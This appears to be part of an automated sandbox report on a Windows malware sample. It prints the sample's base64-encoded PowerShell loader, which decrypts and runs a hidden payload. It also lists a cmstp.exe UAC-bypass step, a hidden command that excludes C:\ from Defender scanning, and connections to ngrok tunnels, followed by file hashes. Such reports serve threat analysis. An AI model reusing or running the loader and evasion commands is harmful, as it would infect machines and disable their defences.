OQBBAEkAQgAyAHYARgBRAFIAQwA0AGYAVgBlAFQAeQBDAFgASQBzAFAAZABJAG8AZABHADIAOQBBADAAOQA1AFcAbwBOAEQANwBtAHcAWgBhAFoAbAA4AEQAbQA0AEUAeQA5ACsAQgBhAFEAQQBOAGsAOABpAE0AdgBGAEsANQBjADYANwBDACsAagBWADcANwBVAC8AKwAvAEoAbwBOAGQARgA1AG4ANQArAFcAOQBoADkARgBTAFIAZgBqAEoAZwBNADMAdABLAE8AUAAzAGIAQwA0ADUARgBKAHoARgBaAEMAbgAxAHkAYwBRAEsAagA0ADcAUwBYAFQAOQA0AFkARABOAGIATABXAEMAZQBGAEkAWABWAEgAcwBmAFIASwBLAGQAQwBPAEEAbQBMAHQAcQBZADgAcQBiAEMAOQByADEAMQBQAHgANgBsAEkAWAAyAEcALwBwAEIATQBmADQARQAzAHgAawBEAG4AdABoAHAAdABiAHIARwBvAHUAZQBNAFQAagAwAGQASwA3AHcAaQBvAFAARABWAGUAQwBqAHQAegB4AHcAbAB3AHgATQA5AFIATABqAG4AeAAyAG0AawAwAFQAVgBSAGUAOQBFAG8AMAB4AG4AVAAwADcAcABUAEEAKwBQAHYARgBUAFcATQBTAEIAVQBVAEIATQBCAGEAYgBEACsAeQBBAFcAYgAzAFQASABEAGgAcwBZAE8AVgBjAFEAWQBrAFEAKwAwAEcAUgB1AGEAMgBwAGIAMgAvAE8AOABEAHcAcwBNACsATgBlAHkASgBGAC8AagBqAGIAegBvAGUAMABmAFEAbwBvAGsAbABXAGIAVQBtADcANQBPAEEAbgBWAGMAQgB6AGEAawBBAC8AVQBlAHUAdgA3AFkAWQBEAEYATwBJAGQANQBVAE8AYgB4AE4AdQA0AEoAawAwAHEARABjAHAAVABmADEATgAxADUANQBwAHoANwBvAGwAZwBZAGYAYwBEAGkANgAyAEQAcABKADMAVABZADYAVgBlAFkASgBsAEoAcQA3AFMAVQA3AHkAdABjAGcANwBkAE0AeQBkAFEAeABoAGYAcABsAGQAZQBaAFoASgB5AHEAaQBGAHkAeAA3AFEAVQBEAHkAMgBkADkAUgBKAFAANwA2ACsAVwAvAE0AYQB4AG0AKwBUAGMAUwBPAHUANQA1AEoAeAB4AEkAYQBoAGcALwA5ADQATgArAGUAbwB5AG4AVgBJAFkAYwBEAEUAbgAyAHkAWgAvAHcAYQBlAEMAWABKAEkAdgB0AGcAWgBZAFkAMwBTADIARwBtAHIAdABVAGsARwBFAFYAUAB0ADIAMwBzAHcASQAwAHkARgA0AHYAbQBtADQAbQBFAEgAcwBQAFAALwBpAHoAQQBnAFQARgAyAEQAQgBvAGcAYgBWAE4AcgBSAGsAUAA4AE8AWQA1ADUAeQB1ADAAZwBFAG0AMwBiAG4AZQB6AGcAYQBDADIAcABjAHkAOQBXAHgATQBFADQAbgBPAEgATQA3AEsAVAB0AFUAagBzAGwAYwBLADkAWgBLAGoARwBzAE4AKwB0AFEAdgA2AFEAcAB6AFYAYwAwADYAbQB3AEQAQgBLAFMAeABYAEUAVABHAHcAeAAwAGUASQBZAHIAUgAwAEgAUwBBAHgAeABxAG8AMwA5AEoAYwBKAEQAeABkAGgAVQAwAGIAegBsAHYASwB5AGYAaAByADEAdwBtAFAANABCAEoAMAA1AGQAeQBPAHMATwBRAEsATABsAFMAYgArAEYAKwBmAFIAbgBBAGcARgBrAGgAWgB4AEcANQBwADAAWAB5AGcAcwAxAGoAOAB6AEMAeABDAGMAcAB6AFcAKwBlAHAARQAvAFoAOAB0AG0AegBmAHQAcgB0AEsAMgA0AGYANwByACsAMABuAFYATABYAHIASgBRAGkAcQBxAEgAUAB3AFAARwBsAEQAOQByAEYASQBrAGwA
dwA2AEkARwAxAFUARgBOAGQARQA2AEUAcgAzADIALwBLADcAWQBrADMAVQBHAFUARAB4AFAAMABXAGcAaABHAFgAQgA2ADEAbQA3AFoAcwBqAFUANgB3AGMAZgBBAFYAOQBjADcAWABzAE8AeQByAE8ATgB4AGcAeQBGAGUAYgBPAFoAOABrAEgAUgBSAFYAWgBNACsAUQBuAFoANwBzADIAYgBBAHgAZgA0AHgAQgA3AGIAdQBIAEwAZAByAE0ANQBrADkAVwBYADkAaAA3AEIASwBtADIAYwA2AFYAegBTAFUAQQBIAG0AQQBTAEEAVABHAHMAMwBoADYAZQAvAFQAKwAvAEcANwA4ADgAOQByADcAUgBJADAAaQBMAHEANABLAHoAVwBTAEsAUgBxAGYARQBaAFYAMgBMAEoAbgBRAHcAUQBmAFAAUABuAGkANwBKADgASgBnAHYAbwB1AEwAVgA3AC8AVABWAGcAUABsAEUAUQBqADUAbAAvADMAeQBjAEwAdAB2AFAARABHADcAYQBqAFYAMgB0AFkAbgAxAGwAagBwADEAVgAyAEEAZQBOAEsASQBnAGEARgB6AFcAZwB4AEEAVwB6AGkALwBCAFgALwAyAFYAWABNAFoASAB4AEkATAB1AEEAbgByADMAYQArAGMAWABOAEEAZwBDAFYAeAB6AGYAUABtAGkAdgA0AGgAdQBWAHUAUgA5AFAAMwBGAFcANwBSAEgAZgBxAGYATQA5AEMAQQB6ADMAMABaAHkAVwBwAEgAcABSAGcAcQAwAEYAUAAvAEEAQQA4AE8AUwAvAE8AUQB0ADAASwB3AGEAcwBtAHIAcQBKAGIASQB2ADUAVwB4AGkAWgB3AE8AbwAyADcANQBpAFkAdwBCAGUAZgArADYAbgBIAGwAagBKAE0AMQAyAHYATQAxAGwARABmAEwAbQBkAHcAZgBaAGIANwA3AGwANQByAEMAcQBrAGkAZwBIADAAZwBNAFMAbAAvAFYAVwBJADEANQBOAGEASQA2AHYAZABOAFUAKwBaAGEAYQBnAFAAdQBSADcAbwBnAE0AcwB4AHkAMABUAG0AbQBsAFEARQBBAFAAWgBXAG4AZwBUAGEAQwBiAGsAWQBqADYATQB0AEsAcABvAFUAYgBTAGoASgBIAHYAYwBRAEwAZAA3AGkASQArAHMAMABzAGgAaABoAEgANAB3AE8AWgAyAGEAcgBRADcAdgB6AEgAaQBiAGEAWgBmAFMAZwBCAEwAegBSAHMAVgBZAEsAKwBWADYAQQAwAFMAZABOAFkAWQBiAHQAcQBTAEkAUABGAEQANQBBADkAWQBXAGkAcABDAHUAUABYAFcANwBQAFcAUgBkAGwAdwBmAHUATgA4ADgAKwBVAE8ATgBEAFQANABSAGkATQBrAG0AcgBLAEEAZABPAE4AWQBaAEMAeABkAGEAaABhAGcAVQAvAG8AWABLAHEAcABWAEkAZQB6ADgAcwByAEEAagB2AEgARwA0AFoARgB0AHcAOABnAG8AcQBPAEgASAA1AGwATAA3AE4AUwB5ADYAVABQAFcAbgA1AFUANQBmADUAUABkAHMATQBEAFkARABaADcAdQBsADIAMQA3AE4AYQBQAEgAdQBQAFYAbwAyAFYATgB2AEsAYwBuAEoAQgAvAFUARwBSAHIATwBBADEAWQBGADkAaAArAEoAbABVAFEAKwBqAFgASABrAEYAbABOAHAAVQBZADIAcgBOAEkAbQA1AHIAYwBSAEEATABJAHkANQBmAG4ASQBYADIAcgB0ADcAZwB2AGYAVAB4AFEANgAvAE4ARAA4AG4AaQB0AFEAcQA5AFEAcAA4AEIATQB3ADgAaABNADQAUQBoAHEAbAByAEIAdAA4AFAAWABQADcAQwA4ADYAVwB2AGgAcgBKACsARQBuAE8AegBoAGwAOQBIAHoAUgBRAEQASQBKADcATwBVAEsAKwB6ADcA
NQB0ADcAbQB3ADIASQB0ADgAdwBuAG8AZQAvAFIAcgBlAGoAeABLAGMAZwAwAGYAawAzAEkAQwByAFcANABPAC8AdwBVAEoARgBGAG4ANAB6AHkATAB4AFMASwBUAEsAQgBXACsASABQAEgAQQBVAFYATwBIAFoARwB2AHEARQBJAEIAbgBYAEkAQwBRAHMAYwBqAG0ALwB2AHgAagBaAG4AdgBJAEQAbgBBADQAVgBOADUAYwBuADMAZgAzAG4ASgBoAE4AYwA5AFEAeQBCAC8AMgBGAFUASwBsADQAWQBZAEYAdgBoAFUAVgBNACsASQBrAFUAUQAyAFgAOQBsAFYATQAwAGUAawBoADEAOQBCAEIAMABnAFoARAA2AFoAZQArADQAQwBOAGYAaAB2ADkAVgA0AFQAQgA4AEcAMwBNAGoAMwA1ADgAUwB1AGYAUgA0AHoAYQBqADQASgBBAGUATwBWADIAVABiAGgAQQA2AFQATABaAEsASQBJAHoARABRAHoAVgBNAFcANAAxAGYAQgBmAGQAdgByAGcARwB2ADQAVQB4AEMAdQBVAEgAWQBZAGgAVQBGAGgAaAA0ADQAdwB0AEUARgB5AEIAYgB2AHAAMgBEAFgASQBvAE0AbQA5AFoAMgBsAFYATQBnAEgAdgBnAHoAZQB4AHQAYQBpAHIARgA1AG4AZgBsAFMAZwBJAFoAawBtAHgAVgBVAEcAMQBKADAAQQBCAEQAQgBYAFUATQBGAFQAbABQAGoAYwBKACsARgB5ADYAUABuAGcAVAA4AE8ARgBaAGoASwBrAEcAcQBPAEUAMAB4AGsAMAA0AFMASwBGADAAKwBaAG4AQwBTAGUATwBnAE0AYwAvADUAdABEAFcARwB0AFYANgBzAHAATgBPADUASwBmAFQAcgBWAHIAWAA2AHUAcgBRAGUANQA1AEIAeABjAE8AcgBwAFcAVQBEAFgAVABrACsAUQBuADYAdABYAHMAeABSAE4ASAArAHQAbABWAHEAMABhAGEALwBZAEcAagAzAEwAcgBoAGYAZwBsAGQAMwBaADkAVQBoADgAcgA3AGYASQBEAEgATABmAEUAdABrAHQARgArAFMAOQBmAHIAaQAvAGMAVgBjACsAVQBVAHEARwBBAEEARgArAFMARwB3AEYAMABKAG4ARQBzADgAZABSADEAMgBXAGIAaABOAE4AUAB4AFoAdQA3AEIAcABrAHgAcwBGAGwAbQBOADYAVgBnAG0AQgA0ADIAcABiADgAawBaAGEAbwBJAFEAdABpAEkARwBUAG8ASQBOAHcAcABkAG0AdwBNAGIAbwBuAGYASwBmADEAbgBKAFcARgBTAHAAOQBmAEkAawB0AFkAYgBJAFQAWgBXAGoAUgAwAHMARAAvAGgAWQAzAGgASQBGAG0ATgBSAFYAbgAyAEkAaQBNAE8ANwB0AFQAbABUAGUANABlADkASgBIAGYAYQBxAEMAZABnAEsAKwB6AHMANwA4AGUAbgBlADQANQB1AFcAagBSAEMAawBGAFkAZABVAEsASgBqAEYAZQBqAEYAagBYAHcAegBhADgANgBkAGQAcABQAE4ATQBKAE8AVgByAGkAQwBmAEgAdwBGAFQARABxAFIAaQAwAFIAQQBiAFkAaABYAEoAYwBBADAATgBvAFoARwBlAEYARABoAGsATABxAFQAUAAzAFoAQgAwAGsAdABhAFYARgBIAGsAMQA0AHcAdgA1AEYARQBLAEgAOABwAHEASABUADkAYgA4AFQAMgBEAHYAeQBEAFMAMQBkAGwAVQBtAEsAZgBiAFcAUQBFAGcATABhADMANwA4ADQAMgA2AHkAVABEAFEAdABsAE0AZgBVAG0AKwAxAEEAbQBoAFoAQwBQAGQARABuACsAdgBPAEgAaABPAFMAWABCAFcAWAAzAHEAcgBzADIAOQBSAFAAQwAvAE8AagAvAFkARwB4AGcAOQAvAFMA
ZAA1ADcAMwBGAFIAMgBSAHQAagBBAHoAcwBqADQAMwBnAGMAbQBkAE4AOABWAGIARQAwAGQANAArAHEAeABRAGQAaQB3AEEAUABuAGEAdgBHADEAawBmAFUAawAwAGIAYgA3AEYAdgBhAGMAYwBJAFUAWQB0ADgAegBuADEATABuAE8AcABQAHkATABHAGEAaABQAFEARQBuAEMAbgAxAGIANQBxAHIAZwBnAEwAcwB4AEEAagBDAHcAaAArAEIAMAAxAEsATwBLACsARABhAGIAVwA0AFQAOABWAGYAYQBDAHYAUwBTAFYAUAA0AGgAeQBVAGgAOABGAE0ATAA5AFYATABRAGcAZABQAFYAOQBZACsAcwBmAEsAcwBDAGYANwAzAE4AUgAvADEAKwBhAE4ASgBuAFEARABIAE4AeQA0AHAAaQB2AGQAQQBZAEwAaQBnADkAdwBzADQAaQBFAFIAaQBMAFgALwBTAHoAawBjAFkAOABnAGIANgBmAFUAQwBwAG0AbQB4AEUASgBvAE4AeABUADEAcABWADUANABzADMAUgBzAG0AagBiADYAVgBSAEMAWQBkAEUAVAB3AEoAagBYADcAWgBPAHEAeQBBAHYAeABOAE0AagBxAFkAagBNAHUAegB4AGsAVAAvAG0AOAA1AFMAcwBsAG0AWgB4AHEAZABUAG4AegAxAFkATQBYADQAUQBuAHAARQBaAFgARgBqAFIANwBvAFAAVABYAC8AdQByAGEARwBDAG0AUQBaAFkASwB6ADYATwBJAGkAdABGADAAcABxAE8AVABiAE8AWgAzADcANwBJAFMATwBZAHgASgBVAHAAdABiAHkAdwBjAFQANAA2ADcAMQBLAEIAZwAyAEUARABYAHEASQB3AC8AawB1AEIAWgA1AEEAUgBWAHcAMABEAGEAcQBVAG4AcwBZAGoARQA4AFkAbgB2AGoAcABYAHoAcgBWAFgASABLAGQAeQArAE8ATQA1AHkAdgA4AEsASwBqAGEAawBPADcARwA5AGMAUQByAHYAUwBnADkARwBOAGIAWQBzAEsAWAAxAGQAcwBLAHoAQQBJAG8AMgBVAHIAegBlAHoAQwB4AGQAdwBCAGUAUgArAEEAbQBxAFAAKwBYAG0ARABZAHUANAAxAGUAbABqAGEAWABoAHQAaQA0AEYAVwBOAHIAdQBVAEYAMgBjACsAVQBrAFQAQwBYAHAAZgBNAHEASwBkAFoATQBQAEwAWgBiAHUATQBOAFIANQBhADcASABrAHkAZwBiAFgANQBLADgAKwBqADYAWABFAC8AOAAwADUAWAA0AEEANAAzAFgATgBCAFoAOABPADgASABnAHcATwBzACsAUwBOAEEAdwA2ADAAQgBOADIASQBnAEIAUQB1AHQAQQBKAGkARABVAGQARgAyADYAegBKAG8AYgB1AEIAVABsAGYAcQAxAEkAagBNAEoAUQBBAE8AZwByAGUAaABrAEMANQBzAHkARwBmAFAARABKADgALwBOAEYANgBCADMAeAAyAEgAYQBOAG4AVQBFAEwASABKAGgANwB4AGoATQBrAGcAYQBjAEIASgBTAHgAKwB5AEQAcwBvAFkAcAAzAFYAaABjAGwASgAwAEwANgByAFgAcgB4AGcAdABNAGEAegBuAG4AdgArAEEANgA0AFgATABzAHEAeQBvAC8ATwBhAFkARgBjACsAcABDAFEAVQAxAHAAUwBaAFcAbwBBAEEARQBZAGcAbQBvAHIAZQA3AGcAVQBmAGEAcwBCAGkAbAAxAFoASwBHAHcAZwBRAFYAQwBpAFEAaABXAEIATQB0AEkAbQBQAGQAMABvAFUASwBsAFYAawBlAE4AQQBiAG8AdQBZAEoAcQAwAFEAZQB1AG4ATgBjAGQAUAB1AEUANgBmAHYASABhAGEASgBEADAAbABHAFcAeQB3AHgAVgBCADQARAAxAEoARwA4ADAAVgB4AGsA
KwBUAFIAYwBOADMAaAB6AE4ARABjADEAcAAvAGkAUQBkAFUASABvAHcAZwBHAGoAagB2AEoANQA4AGQAUgBnAFgAMABkAEMAWQBZAFAAcQBqAG0ANwBDAFYAdgA2AHEAaABsAGYAZwBjAHYAaQBNAEIAeABUAFoAMwB6ADgAbgAvAHEAVAAxAGcAcQA4AGMAZQBnAEYAZABiAC8AagAyAGIASQAzAFcAMABNAHgAYgA1ADQAbgBrAHQAdgByAEEAbwA5AHEASwBKACsAaQA0AEUAYgAxAG8AVAA0AGUANABvADAATgBKAG0AdgAzAFkAawB1AEUATgBtAFcAaQAwAFQAVQBKADMANQBwAEUAVwAxADgAUABMAG8AagBiAHoAMwBaAC8AYQBaAHQATABYAG0AQgBXAGcAegBUAHYAYQBkAHUAbAB3AHoAVQB1AHUATgB3AE0ATgBhAHAAeAA2AG4ATgB5AGIATwB4AE4AWQBYADQAaQA2AEgAUAA5AHkAYQBjAHEAcABWACsAaABXAGwAYwBsAFcAcgAvAGkAQgBaAHcAcAA3AG0ARwBRAEYAcQBaAGgAMwBnAFMAbgBiAC8AaABzAHUAUQBPAEMAOQB1AGQARgBLADEARQBLAEIARwBRAHQATgBZAHkAeQBSAEgARgBvAEcAMwBrADMARgBsADcARAByAFMAbAA2ADkAZwBPAGwAaABGAG0ASwBWAG8AZgBkAGUAKwBnAFEAMABLAHMATABSAFUALwBMAFIAOQBFAG0AVgBDAFQAMAB2AFEANQBzAG4AawBZAHQAeQBUAEEANgAvAFEAdwBPAFUAPQAiACkADQAKACAAIAAgACAAJABpACAAPQAgACQAZABbADAALgAuADEANQBdAA0ACgAgACAAIAAgACQAZQAgAD0AIAAkAGQAWwAxADYALgAuACgAJABkAC4ATABlAG4AZwB0AGgAIAAtACAAMQApAF0ADQAKACAAIAAgACAAJABhAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQADQAKACAAIAAgACAAJABhAGUAcwAuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwANAAoAIAAgACAAIAAkAGEAZQBzAC4ASwBlAHkAIAA9ACAAJABhAA0ACgAgACAAIAAgACQAYQBlAHMALgBJAFYAIAA9ACAAJABpAA0ACgAgACAAIAAgACQAZABlAGMAIAA9ACAAJABhAGUAcwAuAEMAcgBlAGEAdABlAEQAZQBjAHIAeQBwAHQAbwByACgAKQANAAoAIAAgACAAIAAkAG8AdQB0ACAAPQAgACQAZABlAGMALgBUAHIAYQBuAHMAZgBvAHIAbQBGAGkAbgBhAGwAQgBsAG8AYwBrACgAJABlACwAIAAwACwAIAAkAGUALgBMAGUAbgBnAHQAaAApAA0ACgAgACAAIAAgACQAcgBlAHMAIAA9ACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbwB1AHQAKQANAAoAIAAgACAAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAHIAZQBzAA0ACgA= -inputFormat xml -outputFormat text

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2o4uskvu\2o4uskvu.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES16D.tmp" "c:\Users\Admin\AppData\Local\Temp\2o4uskvu\CSC49C4C84E83B744B2903DD7FD9243A6A.TMP"

C:\windows\system32\cmstp.exe

"C:\windows\system32\cmstp.exe" /au C:\windows\temp\xykv5532.inf

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\

C:\Windows\system32\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

"C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 empty.ngrok.io udp
DE 18.192.31.165:443 empty.ngrok.io tcp
US 8.8.8.8:53 165.31.192.18.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.tcp.eu.ngrok.io udp
DE 3.127.253.86:13752 4.tcp.eu.ngrok.io tcp
DE 3.127.253.86:2024 4.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 4.tcp.eu.ngrok.io udp
DE 18.198.77.177:13752 4.tcp.eu.ngrok.io tcp
DE 18.198.77.177:2024 4.tcp.eu.ngrok.io tcp
US 8.8.8.8:53 udp
N/A 52.168.117.175:443 tcp
SE 192.229.221.95:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_saqhm3jx.qnh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3740-11-0x0000020F1A600000-0x0000020F1A622000-memory.dmp

memory/3740-12-0x0000020F1B590000-0x0000020F1B5D4000-memory.dmp

memory/3740-13-0x0000020F1B660000-0x0000020F1B6D6000-memory.dmp

memory/2204-33-0x00000246D7110000-0x00000246D712C000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\2o4uskvu\2o4uskvu.cmdline

MD5 58869a802a9c2e1c04b9eb5d7f432220
SHA1 171ff4a2c60e99776a4886facc6fe3e5c8752034
SHA256 c6b5d80261914ca01c48a67e466579a1d2e5119ceb98672c7e201759e4829eaf
SHA512 39ffa9a6cf2bafbb19a8729f5770197c1b291cba700bbe3e65a3c280d783c6af90ade0f48a1059a29073278f605136e4a23536d1e748e21e97607397572e1090

\??\c:\Users\Admin\AppData\Local\Temp\2o4uskvu\2o4uskvu.0.cs

MD5 f46493b6076a8ef8cc6c44a52727b2a4
SHA1 343c03142c931f1c57edd293deb1c8e53f4e87f0
SHA256 2ae921dbdf50779a8ab114a5cfe4b754d060e2b8ea251bed59215631edbd3baf
SHA512 263ba35062de9f60bd6482fcb337cc6358374309756bf43a6add5712fcfba15cc6cab698e1ae3b1edc6a1910f9ab34523dadbf9c804fb2034b892223d9aa444a

\??\c:\Users\Admin\AppData\Local\Temp\2o4uskvu\CSC49C4C84E83B744B2903DD7FD9243A6A.TMP

MD5 df5abc1b68f314a2534de138b51ff263
SHA1 4c20f0b482ffcd11c8634838a5c73dc88e5710cd
SHA256 ff6e39caa78f23bba3e59ce29f73ffe9aa5a53db4a23f2944cb856c9ed8c8854
SHA512 7a86930e65d2c89ca187768f740ad409453569d16e0e83f6d8c01e53a0152636b37b3beac6fa7159a77fa59937233c6e54d4cf3bb2d763023b5714dfd84057e6

C:\Users\Admin\AppData\Local\Temp\RES16D.tmp

MD5 b75652304ee61ed85280f80ba9d271c6
SHA1 ad0ce839024bc8389cfc5ba5e63636a91b192f7e
SHA256 f5603f8666aa7cfa3585ee157e3ab3a38d02c384b5c65de32aaf4736d8273de1
SHA512 3b2ef0bac64e7118a636293b67f35bf96840886e6e7f0e6bcd3d043a5b338d297dfdef8e755102156ec5d054a4c09c236dc3e00fba1d7f6ef802e60ddc446f0e

C:\Users\Admin\AppData\Local\Temp\2o4uskvu\2o4uskvu.dll

MD5 f1fc8afd1e15c8479c8a20f2de132673
SHA1 fd075c453ae9eea3b0de8991f351f86e477385cd
SHA256 4b98c3a33a84afc36c3afba4bbc60447522875d78d25e4c6f12939f66684b102
SHA512 c0e219addb4380bccc016e329197f0d2694fa02a0bd27c0d40819f2076489a85f88ec04fe9bf35690a11198d6c295a16f6c94bc67636022e0fb28b411d037df9

memory/2204-46-0x00000246D7140000-0x00000246D7148000-memory.dmp

C:\windows\temp\xykv5532.inf

MD5 018502ac4a5c24da82f568213428dce1
SHA1 7c93907925720916d0cc34f7fb47f30ce4e0c96b
SHA256 e736f84e93c335e9067f14027d80b0d79e888b57bc16887de23bb88d315b064e
SHA512 acab30b8079223b15aa5c7144ade22eaaed5889163e25fc389a9500c7f7869d71fc550c10f0eed7532cd28e54de8ec07d20ed25af1619d095020c22ce9dbd0fa

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fb777148f4462b58165887bd7cfaf279
SHA1 148d650f0cb95fbdebd928822392a217dd950835
SHA256 7151b9635f712ef042bcafda0d0f2a6c15e6611f396908ca83af5b67fd9f25fc
SHA512 2a2bb6a0da37b8dc7d72252313f1598937ab0482fff91f332c6e43ca5ca327b635a10511af8353f5f5dd37063c2940077c391afaefc7757518866d5ea6ef271b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d90c464f5e8245f143e045d0b06e62cc
SHA1 f1361149a171d2f09c8aeadb3dc104b7c0e43ea4
SHA256 b2011a58cf7dc6774632e2eab4803382a5dd75ba486bb94b240af6d8cb1445ed
SHA512 477ad88e3485876f294d08530fcdcf7d4ccdc2eb9e7e40c542e029df51bfca26d24c02efdd9ff145bf1a6e6e36e0490eed94091146ddfc51910196469a8b2ba9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5014db2c4ff933f758a9027e98f24a3a
SHA1 fec71b30a6189f55e8aecbe81843b8b2177c37c5
SHA256 011d2427f2f8bef3d68ad19ab9e1cc0f274b92be7379402fd8ae90c40e043716
SHA512 691ed29d1ea0aa7628b932b55bf2529bea2c6dc28017a2bd6eedd3f191933f6b43e4e0e8f6f177f7edf7c72d54285b3bb943207ec9cd07fdbd143c028a8277c2

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

MD5 af59d42f6526cfabf0f502f8e83209f9
SHA1 6505f4560261dedfae55dc4a5b712802ffb2eed6
SHA256 f1a47699ad8f48d7cf68f5db51364433ac8695cc6d2149d26dbf20b9af31bf4f
SHA512 f3fc5ee9df8454ee8abce013a1672fdf01c5a5d08d88e6221c169d3a31d43dbaf50e7bdbbe54e8bb8453f5367d12f016cb834ec6efed363c8f8018cd11e4a646

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d65d5729810e777c618132ea705c1f14
SHA1 c0df1e6c8a70b39b8db337f84e7e9398bc9f6a9e
SHA256 51262a3776b88451b2843a41f185425c1626b1f749f8c10cc8ef243985bef27e
SHA512 8cab4719c12091d99f72c4307619fb7ab31854e81cc3c23304bf650698cb2d0cd00ca03f1e1b2065606dc4f5e28ad272bbc2acdc3383a6eba39d75777e9059f7

memory/3660-84-0x0000000000450000-0x0000000000462000-memory.dmp

memory/3920-85-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-87-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-86-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-97-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-96-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-95-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-94-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-93-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-92-0x0000016158800000-0x0000016158801000-memory.dmp

memory/3920-91-0x0000016158800000-0x0000016158801000-memory.dmp